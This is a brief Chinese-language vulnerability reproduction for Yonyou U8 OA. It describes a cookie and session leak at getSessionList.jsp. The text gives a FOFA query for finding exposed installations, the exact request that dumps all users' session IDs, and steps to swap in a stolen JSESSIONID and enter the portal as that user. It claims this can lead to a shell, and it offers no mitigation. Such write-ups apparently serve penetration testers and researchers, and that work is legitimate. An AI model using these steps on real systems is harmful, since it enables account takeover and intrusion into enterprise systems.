用友U8 OA getSessionList.jsp用户cookie信息泄露漏洞
一、漏洞简介
用友U8+承载了用友人十余年来为成长型企业的信息化管理所倾注的心血,它以U8财务业务一体化、U8ERP、U8All-in-One、U8+形象伴随中国经济的高速发展一路走来,见证了成长型企业信息化从7个应用模块到126个产品及行业应用。用友U8 getSessionList.jsp处存在用户cookie信息泄漏漏洞,攻击者可利用漏洞获取到所有用户的SessionID,利用泄露的SessionID即可登录该用户并获取shell。
二、影响版本
- 用友U8 OA
三、资产测绘
- fofa
"用友U8-OA"
- 特征
四、漏洞复现
- 执行POC读取用户cookie
/yyoa/ext/https/getSessionList.jsp?cmd=getAll
- 获取SESSION之后访问:
/yyoa/common/js/menu/menu.jsp
,替换Cookie
JSESSIONID=XXXXXXXXXXXXXXXXXXXXXXXXXXX
- 访问
/yyoa/portal/portalIndex.jsp
进入首页